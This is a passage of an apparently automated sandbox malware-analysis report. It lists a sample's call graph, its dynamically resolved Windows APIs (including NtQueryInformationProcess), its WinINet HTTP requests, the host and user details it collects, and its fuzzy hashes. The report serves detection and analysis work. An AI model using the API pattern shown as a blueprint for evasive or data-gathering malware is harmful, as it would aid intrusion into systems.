37793->37794 37795 a34610 2 API calls 37794->37795 37796 a33708 37795->37796 37797 a34610 2 API calls 37796->37797 37798 a33721 37797->37798 37799 a34610 2 API calls 37798->37799 37800 a3373a 37799->37800 37801 a34610 2 API calls 37800->37801 37802 a33753 37801->37802 37803 a34610 2 API calls 37802->37803 37804 a3376c 37803->37804 37805 a34610 2 API calls 37804->37805 37806 a33785 37805->37806 37807 a34610 2 API calls 37806->37807 37808 a3379e 37807->37808 
37809 a34610 2 API calls 37808->37809 37810 a337b7 37809->37810 37811 a34610 2 API calls 37810->37811 37812 a337d0 37811->37812 37813 a34610 2 API calls 37812->37813 37814 a337e9 37813->37814 37815 a34610 2 API calls 37814->37815 37816 a33802 37815->37816 37817 a34610 2 API calls 37816->37817 37818 a3381b 37817->37818 37819 a34610 2 API calls 37818->37819 37820 a33834 37819->37820 37821 a34610 2 API calls 37820->37821 37822 a3384d 37821->37822 37823 a34610 2 API calls 37822->37823 37824 a33866 37823->37824 37825 a34610 2 API calls 37824->37825 37826 a3387f 37825->37826 37827 a34610 2 API calls 37826->37827 37828 a33898 37827->37828 37829 a34610 2 API calls 37828->37829 37830 a338b1 37829->37830 37831 a34610 2 API calls 37830->37831 37832 a338ca 37831->37832 37833 a34610 2 API calls 37832->37833 37834 a338e3 37833->37834 37835 a34610 2 API calls 37834->37835 37836 a338fc 37835->37836 37837 a34610 2 API calls 37836->37837 37838 a33915 37837->37838 37839 a34610 2 API calls 37838->37839 37840 a3392e 37839->37840 37841 a34610 2 API calls 37840->37841 37842 a33947 37841->37842 37843 a34610 2 API calls 37842->37843 37844 a33960 37843->37844 37845 a34610 2 API calls 37844->37845 37846 a33979 37845->37846 37847 a34610 2 API calls 37846->37847 37848 a33992 37847->37848 37849 a34610 2 API calls 37848->37849 37850 a339ab 37849->37850 37851 a34610 2 API calls 37850->37851 37852 a339c4 37851->37852 37853 a34610 2 API calls 37852->37853 37854 a339dd 37853->37854 37855 a34610 2 API calls 37854->37855 37856 a339f6 37855->37856 37857 a34610 2 API calls 37856->37857 37858 a33a0f 37857->37858 37859 a34610 2 API calls 37858->37859 37860 a33a28 37859->37860 37861 a34610 2 API calls 37860->37861 37862 a33a41 37861->37862 37863 a34610 2 API calls 37862->37863 37864 a33a5a 37863->37864 37865 a34610 2 API calls 37864->37865 37866 a33a73 37865->37866 37867 a34610 2 API calls 37866->37867 37868 a33a8c 37867->37868 37869 a34610 2 API calls 37868->37869 37870 a33aa5 37869->37870 37871 a34610 2 
API calls 37870->37871 37872 a33abe 37871->37872 37873 a34610 2 API calls 37872->37873 37874 a33ad7 37873->37874 37875 a34610 2 API calls 37874->37875 37876 a33af0 37875->37876 37877 a34610 2 API calls 37876->37877 37878 a33b09 37877->37878 37879 a34610 2 API calls 37878->37879 37880 a33b22 37879->37880 37881 a34610 2 API calls 37880->37881 37882 a33b3b 37881->37882 37883 a34610 2 API calls 37882->37883 37884 a33b54 37883->37884 37885 a34610 2 API calls 37884->37885 37886 a33b6d 37885->37886 37887 a34610 2 API calls 37886->37887 37888 a33b86 37887->37888 37889 a34610 2 API calls 37888->37889 37890 a33b9f 37889->37890 37891 a34610 2 API calls 37890->37891 37892 a33bb8 37891->37892 37893 a34610 2 API calls 37892->37893 37894 a33bd1 37893->37894 37895 a34610 2 API calls 37894->37895 37896 a33bea 37895->37896 37897 a34610 2 API calls 37896->37897 37898 a33c03 37897->37898 37899 a34610 2 API calls 37898->37899 37900 a33c1c 37899->37900 37901 a34610 2 API calls 37900->37901 37902 a33c35 37901->37902 37903 a34610 2 API calls 37902->37903 37904 a33c4e 37903->37904 37905 a34610 2 API calls 37904->37905 37906 a33c67 37905->37906 37907 a34610 2 API calls 37906->37907 37908 a33c80 37907->37908 37909 a34610 2 API calls 37908->37909 37910 a33c99 37909->37910 37911 a34610 2 API calls 37910->37911 37912 a33cb2 37911->37912 37913 a34610 2 API calls 37912->37913 37914 a33ccb 37913->37914 37915 a34610 2 API calls 37914->37915 37916 a33ce4 37915->37916 37917 a34610 2 API calls 37916->37917 37918 a33cfd 37917->37918 37919 a34610 2 API calls 37918->37919 37920 a33d16 37919->37920 37921 a34610 2 API calls 37920->37921 37922 a33d2f 37921->37922 37923 a34610 2 API calls 37922->37923 37924 a33d48 37923->37924 37925 a34610 2 API calls 37924->37925 37926 a33d61 37925->37926 37927 a34610 2 API calls 37926->37927 37928 a33d7a 37927->37928 37929 a34610 2 API calls 37928->37929 37930 a33d93 37929->37930 37931 a34610 2 API calls 37930->37931 37932 a33dac 37931->37932 37933 a34610 2 API calls 
37932->37933 37934 a33dc5 37933->37934 37935 a34610 2 API calls 37934->37935 37936 a33dde 37935->37936 37937 a34610 2 API calls 37936->37937 37938 a33df7 37937->37938 37939 a34610 2 API calls 37938->37939 37940 a33e10 37939->37940 37941 a34610 2 API calls 37940->37941 37942 a33e29 37941->37942 37943 a34610 2 API calls 37942->37943 37944 a33e42 37943->37944 37945 a34610 2 API calls 37944->37945 37946 a33e5b 37945->37946 37947 a34610 2 API calls 37946->37947 37948 a33e74 37947->37948 37949 a34610 2 API calls 37948->37949 37950 a33e8d 37949->37950 37951 a34610 2 API calls 37950->37951 37952 a33ea6 37951->37952 37953 a34610 2 API calls 37952->37953 37954 a33ebf 37953->37954 37955 a34610 2 API calls 37954->37955 37956 a33ed8 37955->37956 37957 a34610 2 API calls 37956->37957 37958 a33ef1 37957->37958 37959 a34610 2 API calls 37958->37959 37960 a33f0a 37959->37960 37961 a34610 2 API calls 37960->37961 37962 a33f23 37961->37962 37963 a34610 2 API calls 37962->37963 37964 a33f3c 37963->37964 37965 a34610 2 API calls 37964->37965 37966 a33f55 37965->37966 37967 a34610 2 API calls 37966->37967 37968 a33f6e 37967->37968 37969 a34610 2 API calls 37968->37969 37970 a33f87 37969->37970 37971 a34610 2 API calls 37970->37971 37972 a33fa0 37971->37972 37973 a34610 2 API calls 37972->37973 37974 a33fb9 37973->37974 37975 a34610 2 API calls 37974->37975 37976 a33fd2 37975->37976 37977 a34610 2 API calls 37976->37977 37978 a33feb 37977->37978 37979 a34610 2 API calls 37978->37979 37980 a34004 37979->37980 37981 a34610 2 API calls 37980->37981 37982 a3401d 37981->37982 37983 a34610 2 API calls 37982->37983 37984 a34036 37983->37984 37985 a34610 2 API calls 37984->37985 37986 a3404f 37985->37986 37987 a34610 2 API calls 37986->37987 37988 a34068 37987->37988 37989 a34610 2 API calls 37988->37989 37990 a34081 37989->37990 37991 a34610 2 API calls 37990->37991 37992 a3409a 37991->37992 37993 a34610 2 API calls 37992->37993 37994 a340b3 37993->37994 37995 a34610 2 API calls 37994->37995 
37996 a340cc 37995->37996 37997 a34610 2 API calls 37996->37997 37998 a340e5 37997->37998 37999 a34610 2 API calls 37998->37999 38000 a340fe 37999->38000 38001 a34610 2 API calls 38000->38001 38002 a34117 38001->38002 38003 a34610 2 API calls 38002->38003 38004 a34130 38003->38004 38005 a34610 2 API calls 38004->38005 38006 a34149 38005->38006 38007 a34610 2 API calls 38006->38007 38008 a34162 38007->38008 38009 a34610 2 API calls 38008->38009 38010 a3417b 38009->38010 38011 a34610 2 API calls 38010->38011 38012 a34194 38011->38012 38013 a34610 2 API calls 38012->38013 38014 a341ad 38013->38014 38015 a34610 2 API calls 38014->38015 38016 a341c6 38015->38016 38017 a34610 2 API calls 38016->38017 38018 a341df 38017->38018 38019 a34610 2 API calls 38018->38019 38020 a341f8 38019->38020 38021 a34610 2 API calls 38020->38021 38022 a34211 38021->38022 38023 a34610 2 API calls 38022->38023 38024 a3422a 38023->38024 38025 a34610 2 API calls 38024->38025 38026 a34243 38025->38026 38027 a34610 2 API calls 38026->38027 38028 a3425c 38027->38028 38029 a34610 2 API calls 38028->38029 38030 a34275 38029->38030 38031 a34610 2 API calls 38030->38031 38032 a3428e 38031->38032 38033 a34610 2 API calls 38032->38033 38034 a342a7 38033->38034 38035 a34610 2 API calls 38034->38035 38036 a342c0 38035->38036 38037 a34610 2 API calls 38036->38037 38038 a342d9 38037->38038 38039 a34610 2 API calls 38038->38039 38040 a342f2 38039->38040 38041 a34610 2 API calls 38040->38041 38042 a3430b 38041->38042 38043 a34610 2 API calls 38042->38043 38044 a34324 38043->38044 38045 a34610 2 API calls 38044->38045 38046 a3433d 38045->38046 38047 a34610 2 API calls 38046->38047 38048 a34356 38047->38048 38049 a34610 2 API calls 38048->38049 38050 a3436f 38049->38050 38051 a34610 2 API calls 38050->38051 38052 a34388 38051->38052 38053 a34610 2 API calls 38052->38053 38054 a343a1 38053->38054 38055 a34610 2 API calls 38054->38055 38056 a343ba 38055->38056 38057 a34610 2 API calls 38056->38057 38058 a343d3 
38057->38058 38059 a34610 2 API calls 38058->38059 38060 a343ec 38059->38060 38061 a34610 2 API calls 38060->38061 38062 a34405 38061->38062 38063 a34610 2 API calls 38062->38063 38064 a3441e 38063->38064 38065 a34610 2 API calls 38064->38065 38066 a34437 38065->38066 38067 a34610 2 API calls 38066->38067 38068 a34450 38067->38068 38069 a34610 2 API calls 38068->38069 38070 a34469 38069->38070 38071 a34610 2 API calls 38070->38071 38072 a34482 38071->38072 38073 a34610 2 API calls 38072->38073 38074 a3449b 38073->38074 38075 a34610 2 API calls 38074->38075 38076 a344b4 38075->38076 38077 a34610 2 API calls 38076->38077 38078 a344cd 38077->38078 38079 a34610 2 API calls 38078->38079 38080 a344e6 38079->38080 38081 a34610 2 API calls 38080->38081 38082 a344ff 38081->38082 38083 a34610 2 API calls 38082->38083 38084 a34518 38083->38084 38085 a34610 2 API calls 38084->38085 38086 a34531 38085->38086 38087 a34610 2 API calls 38086->38087 38088 a3454a 38087->38088 38089 a34610 2 API calls 38088->38089 38090 a34563 38089->38090 38091 a34610 2 API calls 38090->38091 38092 a3457c 38091->38092 38093 a34610 2 API calls 38092->38093 38094 a34595 38093->38094 38095 a34610 2 API calls 38094->38095 38096 a345ae 38095->38096 38097 a34610 2 API calls 38096->38097 38098 a345c7 38097->38098 38099 a34610 2 API calls 38098->38099 38100 a345e0 38099->38100 38101 a34610 2 API calls 38100->38101 38102 a345f9 38101->38102 38103 a49f20 38102->38103 38104 a4a346 8 API calls 38103->38104 38105 a49f30 43 API calls 38103->38105 38106 a4a456 38104->38106 38107 a4a3dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38104->38107 38105->38104 38108 a4a526 38106->38108 38109 a4a463 8 API calls 38106->38109 38107->38106 38110 a4a52f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38108->38110 38111 a4a5a8 38108->38111 38109->38108 38110->38111 38112 a4a5b5 6 API calls 38111->38112 38113 a4a647 38111->38113 38112->38113 38114 a4a654 9 API calls 

                                      Control-flow Graph
                                      APIs
                                      • GetProcAddress.KERNEL32(77190000,013117C8), ref: 00A49BF1
                                      • GetProcAddress.KERNEL32(77190000,013116A8), ref: 00A49C0A
                                      • GetProcAddress.KERNEL32(77190000,01311768), ref: 00A49C22
                                      • GetProcAddress.KERNEL32(77190000,013116C0), ref: 00A49C3A
                                      • GetProcAddress.KERNEL32(77190000,01311750), ref: 00A49C53
                                      • GetProcAddress.KERNEL32(77190000,01318B08), ref: 00A49C6B
                                      • GetProcAddress.KERNEL32(77190000,013056C8), ref: 00A49C83
                                      • GetProcAddress.KERNEL32(77190000,013054C8), ref: 00A49C9C
                                      • GetProcAddress.KERNEL32(77190000,013117B0), ref: 00A49CB4
                                      • GetProcAddress.KERNEL32(77190000,013114F8), ref: 00A49CCC
                                      • GetProcAddress.KERNEL32(77190000,013116D8), ref: 00A49CE5
                                      • GetProcAddress.KERNEL32(77190000,01311708), ref: 00A49CFD
                                      • GetProcAddress.KERNEL32(77190000,01305568), ref: 00A49D15
                                      • GetProcAddress.KERNEL32(77190000,01311588), ref: 00A49D2E
                                      • GetProcAddress.KERNEL32(77190000,013115A0), ref: 00A49D46
                                      • GetProcAddress.KERNEL32(77190000,01305428), ref: 00A49D5E
                                      • GetProcAddress.KERNEL32(77190000,013115D0), ref: 00A49D77
                                      • GetProcAddress.KERNEL32(77190000,01311738), ref: 00A49D8F
                                      • GetProcAddress.KERNEL32(77190000,013056E8), ref: 00A49DA7
                                      • GetProcAddress.KERNEL32(77190000,01311810), ref: 00A49DC0
                                      • GetProcAddress.KERNEL32(77190000,013054A8), ref: 00A49DD8
                                      • LoadLibraryA.KERNEL32(01311888,?,00A46CA0), ref: 00A49DEA
                                      • LoadLibraryA.KERNEL32(01311828,?,00A46CA0), ref: 00A49DFB
                                      • LoadLibraryA.KERNEL32(01311858,?,00A46CA0), ref: 00A49E0D
                                      • LoadLibraryA.KERNEL32(01311870,?,00A46CA0), ref: 00A49E1F
                                      • LoadLibraryA.KERNEL32(013118B8,?,00A46CA0), ref: 00A49E30
                                      • GetProcAddress.KERNEL32(76850000,01311840), ref: 00A49E52
                                      • GetProcAddress.KERNEL32(77040000,013118A0), ref: 00A49E73
                                      • GetProcAddress.KERNEL32(77040000,013117F8), ref: 00A49E8B
                                      • GetProcAddress.KERNEL32(75A10000,01318DF8), ref: 00A49EAD
                                      • GetProcAddress.KERNEL32(75690000,01305608), ref: 00A49ECE
                                      • GetProcAddress.KERNEL32(776F0000,01318C28), ref: 00A49EEF
                                      • GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 00A49F06
                                      Strings
                                      • NtQueryInformationProcess, xrefs: 00A49EFA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID: NtQueryInformationProcess
                                      • API String ID: 2238633743-2781105232
                                      • Opcode ID: 4af79b33590152e8245f462c50020a5238720bd6231e6dac1f7b6ddc43560ea9
                                      • Instruction ID: db818aa8ca9453892e452e8bedc50c5c7285af0a2f1d4cec48256b7af6c0e181
                                      • Opcode Fuzzy Hash: 4af79b33590152e8245f462c50020a5238720bd6231e6dac1f7b6ddc43560ea9
                                      • Instruction Fuzzy Hash: 35A10BB5A183009FD344DFA9EC88B567BA9A74D701B10961AB90DCB3B0D634B950CBB5

                                      Control-flow Graph
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00A3465F
                                      • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00A347EC
                                      Strings
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00A34728, 00A34763, 00A34638, 00A346D3, 00A346BD, 00A347CB, 00A34643, 00A346FC, 00A3478F, 00A3462D, 00A346A7, 00A34617, 00A3467D, 00A34622, 00A34707, 00A34784, 00A34688, 00A346B2, 00A347B5, 00A347C0, 00A34667, 00A34672, 00A3476E, 00A3479F, 00A34712, 00A34779, 00A34693, 00A346C8, 00A3471D, 00A347AA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeapProtectVirtual
                                      • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (the same string repeated 30 times, once per xref, joined with $)
                                      • API String ID: 1542196881-2218711628
                                      • Opcode ID: 9926c55c28cd1efe4659f462a3ab402ba2c077cb1c36abb1e0376ec79ce40417
                                      • Instruction ID: 032d1c753353975e2b2f0c4efc7253bbd38e74022941522cdf154da1ee9ff0b0
                                      • Opcode Fuzzy Hash: 9926c55c28cd1efe4659f462a3ab402ba2c077cb1c36abb1e0376ec79ce40417
                                      • Instruction Fuzzy Hash: 8D41F360AC3A047EE628FBB49C52D9F76667F47709F825848AC085A286CE70750F47B7

                                      Control-flow Graph
                                      APIs
                                        • Part of subcall function 00A4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00A4AAF6
                                        • Part of subcall function 00A34800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00A34889
                                        • Part of subcall function 00A34800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00A34899
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                      • InternetOpenA.WININET(00A50DFF,00000001,00000000,00000000,00000000), ref: 00A36331
                                      • StrCmpCA.SHLWAPI(?,0131F410), ref: 00A36353
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00A36385
                                      • HttpOpenRequestA.WININET(00000000,GET,?,0131EE20,00000000,00000000,00400100,00000000), ref: 00A363D5
                                      • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00A3640F
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A36421
                                      • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00A3644D
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00A364BD
                                      • InternetCloseHandle.WININET(00000000), ref: 00A3653F
                                      • InternetCloseHandle.WININET(00000000), ref: 00A36549
                                      • InternetCloseHandle.WININET(00000000), ref: 00A36553
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                      • String ID: ERROR$ERROR$GET
                                      • API String ID: 3749127164-2509457195
                                      • Opcode ID: 4b4ddbd9c5395471e889f93b13c91ce716fb523d4a2151c838c01dd392da5a00
                                      • Instruction ID: d1757f4282a63b7162da97c34280d5e4fe24ad6b1c969840211c64f8ee86db7a
                                      • Opcode Fuzzy Hash: 4b4ddbd9c5395471e889f93b13c91ce716fb523d4a2151c838c01dd392da5a00
                                      • Instruction Fuzzy Hash: 72713D75A40318ABEB24DFA0CD59BEE7775BB44700F1081A8F50AAB294DBB46E84CF51

                                      Control-flow Graph
                                      control_flow_graph 1356 a47690-a476da GetWindowsDirectoryA 1357 a476e3-a47757 GetVolumeInformationA call a48e90 * 3 1356->1357 1358 a476dc 1356->1358 1365 a47768-a4776f 1357->1365 1358->1357 1366 a47771-a4778a call a48e90 1365->1366 1367 a4778c-a477a7 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 a477b8-a477e8 wsprintfA call a4aa50 1367->1369 1370 a477a9-a477b6 call a4aa50 1367->1370 1377 a4780e-a4781e 1369->1377 1370->1377
                                      APIs
                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00A476D2
                                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A4770F
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A47793
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00A4779A
                                      • wsprintfA.USER32 ref: 00A477D0
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                      • String ID: :$C$\
                                      • API String ID: 1544550907-3809124531
                                      • Opcode ID: 56811a9dc003dbaa30bae725fbe172b3de39d9aa49dc29791d96e2444a4512e8
                                      • Instruction ID: 48585fb2d7f8d45055886b3cff7e45c3c2d2ca1d94b6c4de7582b5f593d94f2a
                                      • Opcode Fuzzy Hash: 56811a9dc003dbaa30bae725fbe172b3de39d9aa49dc29791d96e2444a4512e8
                                      • Instruction Fuzzy Hash: A141B6B5D04348EBDB10DFA4DD45FDEBBB8AF48704F104199F609AB280D774AA44CBA5
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00A311B7), ref: 00A47A10
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00A47A17
                                      • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00A47A2F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateNameProcessUser
                                      • String ID:
                                      • API String ID: 1296208442-0
                                      • Opcode ID: 7ef24a7723a4d397a63f5f1e863d1fd2873aecf91721162eb3d83d6e4899b39a
                                      • Instruction ID: 8df709fbcf5bef8dc5fae4a4c89dd3425dcd055358a9cdbcfafaa78e16e0835d
                                      • Opcode Fuzzy Hash: 7ef24a7723a4d397a63f5f1e863d1fd2873aecf91721162eb3d83d6e4899b39a
                                      • Instruction Fuzzy Hash: 83F04FB1D48349EBC700DF98DD46BAEBBB8FB45711F10021AF619E6780C77525008BB1
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitInfoProcessSystem
                                      • String ID:
                                      • API String ID: 752954902-0
                                      • Opcode ID: d9b65a7abf220b3ac733655eaaf4e14a320b85c625c2e45a5530a0f348c81e29
